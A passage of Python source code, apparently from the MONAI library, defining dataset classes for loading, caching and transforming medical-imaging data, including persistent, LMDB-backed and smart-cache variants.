Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset For example, typical input data can be a list of dictionaries:: [{ { { 'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz', 'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz', 'extra': 123 'extra': 456 'extra': 789 }, }, }] """ def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None: """ Args: data: input data to load and transform to generate dataset for model. transform: a callable data transform on input data. """ self.data = data self.transform = transform def __len__(self) -> int: return len(self.data) def _transform(self, index: int): """ Fetch single data item from `self.data`. """ data_i = self.data[index] return apply_transform(self.transform, data_i) if self.transform is not None else data_i def __getitem__(self, index: Union[int, slice, Sequence[int]]): """ Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise. """ if isinstance(index, slice): # dataset[:42] start, stop, step = index.indices(len(self)) indices = range(start, stop, step) return Subset(dataset=self, indices=indices) if isinstance(index, collections.abc.Sequence): # dataset[[1, 3, 4]] return Subset(dataset=self, indices=index) return self._transform(index) class PersistentDataset(Dataset): """ Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data, it can operate transforms for specific fields. Results from the non-random transform components are computed when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses. 
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset For example, typical input data can be a list of dictionaries:: [{ { { 'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz', 'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz', 'extra': 123 'extra': 456 'extra': 789 }, }, }] For a composite transform like .. code-block:: python [ LoadImaged(keys=['image', 'label']), Orientationd(keys=['image', 'label'], axcodes='RAS'), ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True), RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96), pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0), ToTensord(keys=['image', 'label'])] Upon first use a filename based dataset will be processed by the transform for the [LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to the `cache_dir` before applying the remaining random dependant transforms [RandCropByPosNegLabeld, ToTensord] elements for use in the analysis. Subsequent uses of a dataset directly read pre-processed results from `cache_dir` followed by applying the random dependant parts of transform processing. Note: The input data must be a list of file paths and will hash them as cache keys. When loading persistent cache content, it can't guarantee the cached data matches current transform chain, so please make sure to use exactly the same non-random transforms and the args as the cache content, otherwise, it may cause unexpected errors. """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], cache_dir: Optional[Union[Path, str]], hash_func: Callable[..., bytes] = pickle_hashing, ) -> None: """ Args: data: input data file paths to load and transform to generate dataset for model. `PersistentDataset` expects input data to be a list of serializable and hashes them as cache keys using `hash_func`. transform: transforms to execute operations on input data. cache_dir: If specified, this is the location for persistent storage of pre-computed transformed data tensors. The cache_dir is computed once, and persists on disk until explicitly removed. Different runs, programs, experiments may share a common cache dir provided that the transforms pre-processing is consistent. If `cache_dir` doesn't exist, will automatically create it. If `cache_dir` is `None`, there is effectively no caching. hash_func: a callable to compute hash from data items to be cached. defaults to `monai.data.utils.pickle_hashing`. """ if not isinstance(transform, Compose): transform = Compose(transform) super().__init__(data=data, transform=transform) self.cache_dir = Path(cache_dir) if cache_dir is not None else None self.hash_func = hash_func if self.cache_dir is not None: if not self.cache_dir.exists(): self.cache_dir.mkdir(parents=True, exist_ok=True) if not self.cache_dir.is_dir(): raise ValueError("cache_dir must be a directory.") def _pre_transform(self, item_transformed): """ Process the data from original state up to the first random element. 
Args: item_transformed: The data to be transformed Returns: the transformed element up to the first identified random transform object """ for _transform in self.transform.transforms: # type:ignore # execute all the deterministic transforms if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform): break # this is to be consistent with CacheDataset even though it's not in a multi-thread situation. _xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform item_transformed = apply_transform(_xform, item_transformed) return item_transformed def _post_transform(self, item_transformed): """ Process the data from before the first random transform to the final state ready for evaluation. Args: item_transformed: The data to be transformed (already processed up to the first random transform) Returns: the transformed element through the random transforms """ if not isinstance(self.transform, Compose): raise ValueError("transform must be an instance of monai.transforms.Compose.") start_post_randomize_run = False for _transform in self.transform.transforms: if ( start_post_randomize_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform) ): start_post_randomize_run = True item_transformed = apply_transform(_transform, item_transformed) return item_transformed def _cachecheck(self, item_transformed): """ A function to cache the expensive input data transform operations so that huge data sets (larger than computer memory) can be processed on the fly as needed, and intermediate results written to disk for future use. Args: item_transformed: The current data element to be mutated into transformed representation Returns: The transformed data_element, either from cache, or explicitly computing it. Warning: The current implementation does not encode transform information as part of the hashing mechanism used for generating cache names. If the transforms applied are changed in any way, the objects in the cache dir will be invalid. The hash for the cache is ONLY dependant on the input filename paths. """ hashfile = None if self.cache_dir is not None: data_item_md5 = self.hash_func(item_transformed).decode("utf-8") hashfile = self.cache_dir / f"{data_item_md5}.pt" if hashfile is not None and hashfile.is_file(): # cache hit try: return torch.load(hashfile) except PermissionError as e: if sys.platform == "win32": pass # windows machine multiprocessing not efficiently supported else: raise e _item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed if hashfile is not None: # NOTE: Writing to a temporary directory and then using a nearly atomic rename operation # to make the cache more robust to manual killing of parent process # which may leave partially written cache files in an incomplete state with tempfile.TemporaryDirectory() as tmpdirname: temp_hash_file = Path(tmpdirname) / hashfile.name torch.save(_item_transformed, temp_hash_file) if temp_hash_file.is_file() and not hashfile.is_file(): # On Unix, if target exists and is a file, it will be replaced silently if the user has permission. # for more details: https://docs.python.org/3/library/shutil.html#shutil.move. 
try: shutil.move(temp_hash_file, hashfile) except FileExistsError: pass return _item_transformed def _transform(self, index: int): pre_random_item = self._cachecheck(self.data[index]) return self._post_transform(pre_random_item) class CacheNTransDataset(PersistentDataset): """ Extension of `PersistentDataset`, tt can also cache the result of first N transforms, no matter it's random or not. """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], cache_n_trans: int, cache_dir: Optional[Union[Path, str]], hash_func: Callable[..., bytes] = pickle_hashing, ) -> None: """ Args: data: input data file paths to load and transform to generate dataset for model. `PersistentDataset` expects input data to be a list of serializable and hashes them as cache keys using `hash_func`. transform: transforms to execute operations on input data. cache_n_trans: cache the result of first N transforms. cache_dir: If specified, this is the location for persistent storage of pre-computed transformed data tensors. The cache_dir is computed once, and persists on disk until explicitly removed. Different runs, programs, experiments may share a common cache dir provided that the transforms pre-processing is consistent. If `cache_dir` doesn't exist, will automatically create it. If `cache_dir` is `None`, there is effectively no caching. hash_func: a callable to compute hash from data items to be cached. defaults to `monai.data.utils.pickle_hashing`. """ super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func) self.cache_n_trans = cache_n_trans def _pre_transform(self, item_transformed): """ Process the data from original state up to the N element. Args: item_transformed: The data to be transformed Returns: the transformed element up to the N transform object """ if not isinstance(self.transform, Compose): raise ValueError("transform must be an instance of monai.transforms.Compose.") for i, _transform in enumerate(self.transform.transforms): if i == self.cache_n_trans: break _xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform item_transformed = apply_transform(_xform, item_transformed) return item_transformed def _post_transform(self, item_transformed): """ Process the data from before the N + 1 transform to the final state ready for evaluation. Args: item_transformed: The data to be transformed (already processed up to the first N transform) Returns: the final transformed result """ if not isinstance(self.transform, Compose): raise ValueError("transform must be an instance of monai.transforms.Compose.") for i, _transform in enumerate(self.transform.transforms): if i >= self.cache_n_trans: item_transformed = apply_transform(_transform, item_transformed) return item_transformed class LMDBDataset(PersistentDataset): """ Extension of `PersistentDataset` using LMDB as the backend. 
See Also: :py:class:`monai.data.PersistentDataset` Examples: >>> items = [{"data": i} for i in range(5)] # [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}] >>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1)) >>> print(list(lmdb_ds)) # using the cached results """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], cache_dir: Union[Path, str] = "cache", hash_func: Callable[..., bytes] = pickle_hashing, db_name: str = "monai_cache", progress: bool = True, pickle_protocol=pickle.HIGHEST_PROTOCOL, lmdb_kwargs: Optional[dict] = None, ) -> None: """ Args: data: input data file paths to load and transform to generate dataset for model. `LMDBDataset` expects input data to be a list of serializable and hashes them as cache keys using `hash_func`. transform: transforms to execute operations on input data. cache_dir: if specified, this is the location for persistent storage of pre-computed transformed data tensors. The cache_dir is computed once, and persists on disk until explicitly removed. Different runs, programs, experiments may share a common cache dir provided that the transforms pre-processing is consistent. If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache". hash_func: a callable to compute hash from data items to be cached. defaults to `monai.data.utils.pickle_hashing`. db_name: lmdb database file name. Defaults to "monai_cache". progress: whether to display a progress bar. pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL. https://docs.python.org/3/library/pickle.html#pickle-protocols lmdb_kwargs: additional keyword arguments to the lmdb environment. for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class """ super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func) self.progress = progress if not self.cache_dir: raise ValueError("cache_dir must be specified.") self.db_file = self.cache_dir / f"{db_name}.lmdb" self.pickle_protocol = pickle_protocol self.lmdb_kwargs = lmdb_kwargs or {} if not self.lmdb_kwargs.get("map_size", 0): self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size self._read_env = None print(f"Accessing lmdb file: {self.db_file.absolute()}.") def _fill_cache_start_reader(self): # create cache self.lmdb_kwargs["readonly"] = False env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs) if self.progress and not has_tqdm: warnings.warn("LMDBDataset: tqdm is not installed. 
not displaying the caching progress.") for item in tqdm(self.data) if has_tqdm and self.progress else self.data: key = self.hash_func(item) done, retry, val = False, 5, None while not done and retry > 0: try: with env.begin(write=True) as txn: with txn.cursor() as cursor: done = cursor.set_key(key) if done: continue if val is None: val = self._pre_transform(deepcopy(item)) # keep the original hashed val = pickle.dumps(val, protocol=self.pickle_protocol) txn.put(key, val) done = True except lmdb.MapFullError: done, retry = False, retry - 1 size = env.info()["map_size"] new_size = size * 2 warnings.warn(f"Resizing the cache database from {int(size) >> 20}MB to {int(new_size) >> 20}MB.") env.set_mapsize(new_size) except lmdb.MapResizedError: # the mapsize is increased by another process # set_mapsize with a size of 0 to adopt the new size, env.set_mapsize(0) if not done: # still has the map full error size = env.info()["map_size"] env.close() raise ValueError(f"LMDB map size reached, increase size above current size of {size}.") size = env.info()["map_size"] env.close() # read-only database env self.lmdb_kwargs["readonly"] = True self.lmdb_kwargs["map_size"] = size if self.lmdb_kwargs.get("lock", None) is None: self.lmdb_kwargs["lock"] = False if self.lmdb_kwargs.get("readahead", None) is None: self.lmdb_kwargs["readahead"] = False return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs) def _cachecheck(self, item_transformed): """ if the item is not found in the lmdb file, resolves to the persistent cache default behaviour. """ if self._read_env is None: self._read_env = self._fill_cache_start_reader() with self._read_env.begin(write=False) as txn: data = txn.get(self.hash_func(item_transformed)) if data is None: warnings.warn("LMDBDataset: cache key not found, running fallback caching.") return super()._cachecheck(item_transformed) try: return pickle.loads(data) except Exception as err: raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err def info(self): """ Returns: dataset info dictionary. """ if self._read_env is None: self._read_env = self._fill_cache_start_reader() out = dict(self._read_env.info()) out["size"] = len(self.data) out["filename"] = f"{self.db_file.absolute()}" return out class CacheDataset(Dataset): """ Dataset with cache mechanism that can load data and cache deterministic transforms' result during training. By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline. If the requested data is not in the cache, all transforms will run normally (see also :py:class:`monai.data.dataset.Dataset`). Users can set the cache rate or number of items to cache. It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed. To improve the caching efficiency, please always put as many as possible non-random transforms before the randomized ones when composing the chain of transforms. 
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset For example, if the transform is a `Compose` of:: transforms = Compose([ LoadImaged(), AddChanneld(), Spacingd(), Orientationd(), ScaleIntensityRanged(), RandCropByPosNegLabeld(), ToTensord() ]) when `transforms` is used in a multi-epoch training pipeline, before the first training epoch, this dataset will cache the results up to ``ScaleIntensityRanged``, as all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged` can be cached. During training, the dataset will load the cached results and run ``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform and the outcome not cached. Note: `CacheDataset` executes non-random transforms and prepares cache content in the main process before the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process during training. it may take a long time to prepare cache content according to the size of expected cache data. So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to temporarily skip caching. """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], cache_num: int = sys.maxsize, cache_rate: float = 1.0, num_workers: Optional[int] = None, progress: bool = True, ) -> None: """ Args: data: input data to load and transform to generate dataset for model. transform: transforms to execute operations on input data. cache_num: number of items to be cached. Default is `sys.maxsize`. will take the minimum of (cache_num, data_length x cache_rate, data_length). cache_rate: percentage of cached data in total, default is 1.0 (cache all). will take the minimum of (cache_num, data_length x cache_rate, data_length). num_workers: the number of worker processes to use. If num_workers is None then the number returned by os.cpu_count() is used. progress: whether to display a progress bar. """ if not isinstance(transform, Compose): transform = Compose(transform) super().__init__(data=data, transform=transform) self.progress = progress self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data)) self.num_workers = num_workers if self.num_workers is not None: self.num_workers = max(int(self.num_workers), 1) self._cache: List = self._fill_cache() def _fill_cache(self) -> List: if self.cache_num <= 0: return [] if self.progress and not has_tqdm: warnings.warn("tqdm is not installed, will not show the caching progress bar.") with ThreadPool(self.num_workers) as p: if self.progress and has_tqdm: return list( tqdm( p.imap(self._load_cache_item, range(self.cache_num)), total=self.cache_num, desc="Loading dataset", ) ) return list(p.imap(self._load_cache_item, range(self.cache_num))) def _load_cache_item(self, idx: int): """ Args: idx: the index of the input data sequence. 
""" item = self.data[idx] for _transform in self.transform.transforms: # type:ignore # execute all the deterministic transforms if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform): break _xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform item = apply_transform(_xform, item) return item def _transform(self, index: int): if index % len(self) >= self.cache_num: # support negative index # no cache for this index, execute all the transforms directly return super()._transform(index) # load data from cache and execute from the first random transform start_run = False if self._cache is None: self._cache = self._fill_cache() data = self._cache[index] if not isinstance(self.transform, Compose): raise ValueError("transform must be an instance of monai.transforms.Compose.") for _transform in self.transform.transforms: if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform): # only need to deep copy data on first non-deterministic transform if not start_run: start_run = True data = deepcopy(data) data = apply_transform(_transform, data) return data class SmartCacheDataset(Randomizable, CacheDataset): """ Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK. At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items in the cache are used for training. This ensures that data needed for training is readily available, keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic transform sequence before being fed to GPU. At the same time, another thread is preparing replacement items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart Cache replaces the same number of items with replacement items. Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items. Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r), where r is the configured replace rate). For more details, please refer to: https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`. so the actual training images cached and replaced for every epoch are as below:: epoch 1: [image1, image2, image3, image4] epoch 2: [image2, image3, image4, image5] epoch 3: [image3, image4, image5, image1] epoch 3: [image4, image5, image1, image2] epoch N: [image[N % 5] ...] The usage of `SmartCacheDataset` contains 4 steps: 1. Initialize `SmartCacheDataset` object and cache for the first epoch. 2. Call `start()` to run replacement thread in background. 3. Call `update_cache()` before every epoch to replace training items. 4. Call `shutdown()` when training ends. Note: This replacement will not work for below cases: 1. Set the `multiprocessing_context` of DataLoader to `spawn`. 2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0. 3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0. 
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer, otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training. Args: data: input data to load and transform to generate dataset for model. transform: transforms to execute operations on input data. replace_rate: percentage of the cached items to be replaced in every epoch. cache_num: number of items to be cached. Default is `sys.maxsize`. will take the minimum of (cache_num, data_length x cache_rate, data_length). cache_rate: percentage of cached data in total, default is 1.0 (cache all). will take the minimum of (cache_num, data_length x cache_rate, data_length). num_init_workers: the number of worker threads to initialize the cache for first epoch. If num_init_workers is None then the number returned by os.cpu_count() is used. num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch. If num_replace_workers is None then the number returned by os.cpu_count() is used. progress: whether to display a progress bar when caching for the first epoch. shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch. seed: random seed if shuffle is `True`, default to `0`. """ def __init__( self, data: Sequence, transform: Union[Sequence[Callable], Callable], replace_rate: float, cache_num: int = sys.maxsize, cache_rate: float = 1.0, num_init_workers: Optional[int] = None, num_replace_workers: Optional[int] = None, progress: bool = True, shuffle: bool = True, seed: int = 0, ) -> None: if shuffle: self.set_random_state(seed=seed) self.randomize(data) super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress) if self._cache is None: self._cache = self._fill_cache() if self.cache_num >= len(data): warnings.warn( "cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset." ) if replace_rate <= 0: raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.") self.num_replace_workers: Optional[int] = num_replace_workers if self.num_replace_workers is not None: self.num_replace_workers = max(int(self.num_replace_workers), 1) self._total_num: int = len(data) self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num) self._replacements: List[Any] = [None for _ in range(self._replace_num)] self._replace_data_idx: List[int] = list(range(self._replace_num)) self._start_pos: int = 0 self._update_lock: threading.Lock = threading.Lock() self._round: int = 1 self._replace_done: bool = False self._replace_mgr: Optional[threading.Thread] = None self._compute_data_idx() def randomize(self, data: Sequence) -> None: try: self.R.shuffle(data) except TypeError as e: warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.") def _compute_data_idx(self): """ Update the replacement data position in the total data. """ for i in range(self._replace_num): pos: int = self._start_pos + self.cache_num + i if pos >= self._total_num: pos -= self._total_num self._replace_data_idx[i] = pos def is_started(self): """ Check whether the replacement thread is already started. """ if self._replace_mgr is None: return False return self._replace_mgr.is_alive() def start(self): """ Start the background thread to replace training items for every epoch. 
""" if self._replace_mgr is None or not self.is_started(): self._restart() def _restart(self): """ Restart background thread if killed for some reason. """ self._round = 1 self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True) self._replace_mgr.start() def _try_update_cache(self): """ Update the cache items with new replacement for current epoch. """ with self._update_lock: if not self._replace_done: return False del self._cache[: self._replace_num] self._cache.extend(self._replacements) self._start_pos += self._replace_num if self._start_pos >= self._total_num: self._start_pos -= self._total_num self._compute_data_idx() # ready for next round self._round += 1 self._replace_done = False return True def update_cache(self): """ Update cache items for current epoch, need to call this function before every epoch. If the cache has been shutdown before, need to restart the `_replace_mgr` thread. """ if not self._replace_mgr.is_alive(): self._restart() # make sure update is done while not self._try_update_cache(): time.sleep(0.01) def _try_shutdown(self): """ Wait for thread lock to shut down the background thread. """ with self._update_lock: if self._replace_done: self._round = 0 self._replace_done = False return True return False def shutdown(self): """ Shut down the background thread for replacement. """ if not self.is_started(): return # wait until replace mgr is done the current round while not self._try_shutdown(): time.sleep(0.01) self._replace_mgr.join() def _replace_cache_thread(self, index: int): """ Execute deterministic transforms on the new data for replacement. """ pos: int = self._replace_data_idx[index] self._replacements[index] = self._load_cache_item(pos) def _compute_replacements(self): """ Compute expected items for the replacement of next epoch, execute deterministic transforms. It can support multi-threads to accelerate the computation progress. """ with ThreadPool(self.num_replace_workers) as p: p.map(self._replace_cache_thread, list(range(self._replace_num))) self._replace_done = True def _try_manage_replacement(self, check_round): """ Wait thread lock and replace training items in the background thread. """ with self._update_lock: if self._round <= 0: # shutdown replacement self._replace_done = True return True, -1 if self._round != check_round: self._compute_replacements() return False, self._round def manage_replacement(self): """ Background thread for replacement. """ check_round: int = -1 done = False while not done: done, check_round = self._try_manage_replacement(check_round) time.sleep(0.01) def __len__(self): """ The dataset length is given by cache_num instead of len(data). """ return self.cache_num class ZipDataset(Dataset): """ Zip several PyTorch datasets and output data(with the same index) together in a tuple. If the output of single dataset is already a tuple, flatten it and extend to the result. For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta), finally return (img, imgmeta, seg, segmeta). And if the datasets don't have same length, use the minimum length of them as the length of ZipDataset. 
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset Examples:: >>> zip_data = ZipDataset([[1, 2, 3], [4, 5]]) >>> print(len(zip_data)) 2 >>> for item in zip_data: >>> print(item) [1, 4] [2, 5] """ def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None: """ Args: datasets: list of datasets to zip together. transform: a callable data transform operates on the zipped item from `datasets`. """ super().__init__(list(datasets), transform=transform) def __len__(self) -> int: return min((len(dataset) for dataset in self.data)) def _transform(self, index: int): def to_list(x): return list(x) if isinstance(x, (tuple, list)) else [x] data = [] for dataset in self.data: data.extend(to_list(dataset[index])) if self.transform is not None: data = apply_transform(self.transform, data, map_items=False) # transform the list data # use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists return tuple(data) class ArrayDataset(Randomizable, _TorchDataset): """ Dataset for segmentation and classification tasks based on array format input data and transforms. It ensures the same random seeds in the randomized transforms defined for image, segmentation and label. The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object. For example: If train based on Nifti format images without metadata, all transforms can be composed:: img_transform = Compose( [ LoadImage(image_only=True), AddChannel(), RandAdjustContrast() ] ) ArrayDataset(img_file_list, img_transform=img_transform) If training based on images and the metadata, the array transforms can not be composed because several transforms receives multiple parameters or return multiple values. Then Users need to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix to `Spacing` transform:: class TestCompose(Compose): def __call__(self, input_): img, metadata = self.transforms[0](input_) img = self.transforms[1](img) img, _, _ = self.transforms[2](img, metadata["affine"]) return self.transforms[3](img), metadata img_transform = TestCompose( [ LoadImage(image_only=False), AddChannel(), Spacing(pixdim=(1.5, 1.5, 3.0)), RandAdjustContrast() ] ) ArrayDataset(img_file_list, img_transform=img_transform) Examples:: >>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1) >>> print(ds[0]) 1.1 >>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8]) >>> print(ds[0]) [1, 5] """ def __init__( self, img: Sequence, img_transform: Optional[Callable] = None, seg: Optional[Sequence] = None, seg_transform: Optional[Callable] = None, labels: Optional[Sequence] = None, label_transform: Optional[Callable] = None, ) -> None: """ Initializes the dataset with the filename lists. The transform `img_transform` is applied to the images and `seg_transform` to the segmentations. Args: img: sequence of images. img_transform: transform to apply to each element in `img`. seg: sequence of segmentations. seg_transform: transform to apply to each element in `seg`. labels: sequence of labels. label_transform: transform to apply to each element in `labels`. 
""" items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)] self.set_random_state(seed=get_seed()) datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None] self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets) self._seed = 0 # transform synchronization seed def __len__(self) -> int: return len(self.dataset) def randomize(self, data: Optional[Any] = None) -> None: self._seed = self.R.randint(MAX_SEED, dtype="uint32") def __getitem__(self, index: int): self.randomize() if isinstance(self.dataset, ZipDataset): # set transforms of each zip component for dataset in self.dataset.data: transform = getattr(dataset, "transform", None) if isinstance(transform, Randomizable): transform.set_random_state(seed=self._seed) transform = getattr(self.dataset, "transform", None) if isinstance(transform, Randomizable): transform.set_random_state(seed=self._seed) return self.dataset[index] class NPZDictItemDataset(Dataset): """ Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts mapping names to an item extracted from the loaded arrays. If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`, for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset Args: npzfile: Path to .npz file or stream containing .npz file data keys: Maps keys to load from file to name to store in dataset transform: Transform to apply to batch dict other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__ """ def __init__( self, npzfile: Union[str, IO], keys: Dict[str, str], transform: Optional[Callable] = None, other_keys: Optional[Sequence[str]] = (), ): self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM" self.keys: Dict[str, str] = dict(keys) dat = np.load(npzfile) self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()} self.length = self.arrays[first(self.keys.values())].shape[0] self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys} for k, v in self.arrays.items(): if v.shape[0] != self.length: raise ValueError( "All loaded arrays must have the same first dimension " f"size {self.length}, array `{k}` has size {v.shape[0]}" ) super().__init__([], transform) def __len__(self): return self.length def _transform(self, index: int): data = {k: v[index] for k, v in self.arrays.items()} if self.transform is not None: data = apply_transform(self.transform, data) return data class CSVDataset(Dataset): """ Dataset to load data from CSV files and generate a list of dictionaries, every dictionay maps to a row of the CSV file, and the keys of dictionary map to the column names of the CSV file. It can load multiple CSV files and join the tables with addtional `kwargs` arg. Support to only load specific rows and columns. And it can also group several loaded columns to generate a new column, for example, set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be:: [ {"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]}, {"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]}, ] Args: filename: the filename of expected CSV file to load. if providing a list of filenames, it will load all the files and join tables. 
row_indices: indices of the expected rows to load. it should be a list, every item can be a int number or a range `[start, end)` for the indices. for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None, load all the rows in the file. col_names: names of the expected columns to load. if None, load all the columns. col_types: `type` and `default value` to convert the loaded columns, if None, use original data. it should be a dictionary, every item maps to an expected column, the `key` is the column name and the `value` is None or a dictionary to define the default value and data type. the supported keys in dictionary are: ["type", "default"]. for example:: col_types = { "subject_id": {"type": str}, "label": {"type": int, "default": 0}, "ehr_0": {"type": float, "default": 0.0}, "ehr_1": {"type": float, "default": 0.0}, "image": {"type": str, "default": None}, } col_groups: args to group the loaded columns to generate a new column, it should be a dictionary, every item maps to a group, the `key` will be the new column name, the `value` is the names of columns to combine. for example: `col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}` transform: transform to apply on the loaded items of a dictionary data. kwargs: additional arguments for `pandas.merge()` API to join tables. """ def __init__( self, filename: Union[str, Sequence[str]], row_indices: Optional[Sequence[Union[int, str]]] = None, col_names: Optional[Sequence[str]] = None, col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None, col_groups: Optional[Dict[str, Sequence[str]]] = None, transform: Optional[Callable] = None, **kwargs, ): files = ensure_tuple(filename) dfs = [pd.read_csv(f) for f in files] data = convert_tables_to_dicts( dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs, ) super().__init__(data=data, transform=transform)
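# --- Hedged usage sketch (not part of the MONAI source above) --------------
# The four-step SmartCacheDataset lifecycle described in its docstring:
# initialize, start(), update_cache() once per epoch, shutdown().  The toy
# data, the trivial no-op transform and the epoch count are illustrative
# assumptions only.

def _smart_cache_demo(num_epochs: int = 3):
    data = [{"image": i} for i in range(10)]        # toy items
    transform = Compose([lambda x: x])              # deterministic no-op transform
    ds = SmartCacheDataset(
        data, transform, replace_rate=0.25, cache_num=8, shuffle=False
    )
    ds.start()                                      # launch the replacement thread
    for _ in range(num_epochs):
        for _item in ds:                            # serves only the cached subset
            pass
        ds.update_cache()                           # swap in the replacement items
    ds.shutdown()                                   # stop the background thread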
executor.py
